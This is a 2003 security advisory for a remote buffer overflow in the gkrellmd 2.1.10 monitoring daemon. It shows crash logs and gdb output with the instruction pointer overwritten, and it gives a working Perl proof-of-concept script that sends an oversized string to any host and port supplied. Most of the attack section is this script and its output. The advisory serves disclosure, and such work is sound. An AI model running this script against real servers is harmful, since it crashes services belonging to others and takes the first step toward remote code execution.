Gkrellmd 2.1.10 remote exploit (buffer overflow)
date: 22-06-2003
author: dodo [dodo@darkwired.ath.cx]
aurhor-url: https://darkwired.ath.cx/

- Description:
Gkrellm is a GTK system monitoring utility, the latest version comes with a daemon.
It's a great peace of software, however the daemon needs more secure code.
gkrellm/gkrellmd: http://www.gkrellm.net/

- Exploitation:
when someone sends data to the gkrellmd, gkrellmd uses buffers to store
this data, however, it doesn't check for the maximum buffersize (128bytes).
This could result in remote executing of code and crashing the daemon.

- Details:

verbose gkrellmd output:

  cyride-bash# gkrellmd -P 661 -V
  update_HZ=3
  connect string from client: gkrellm 2.1.10
  gkrellmd accepted client: dwop.darkwired.da.ru:43755
  received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  Segmentation fault (core dumped)

debugger output (eip):

  cyride-bash# gdb gkrellmd gkrellmd.core
  (gdb) info reg
  eip            0x41414141       0x41414141

  
- Proof of concept:

gkrellmcrash.pl:

  #!/usr/bin/perl -s
  use IO::Socket;
  #
  # proof of concept code
  # tested: grkellmd 2.1.10
  #



    if(!$ARGV[0] || !$ARGV[1])
    { print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

  $host = $ARGV[0];
  $port = $ARGV[1];
  $exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

  $socket = new IO::Socket::INET
  (
  Proto    => "tcp",
  PeerAddr => $host,
  PeerPort => $port,
  );

  die "unable to connect to $host:$port ($!)\n" unless $socket;

  print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
  sleep(1);
  print $socket $exploitstring;

  close($socket);
  
- Vendor Response:
vendor contacted on 22-06-2003
http://www.gkrellm.net/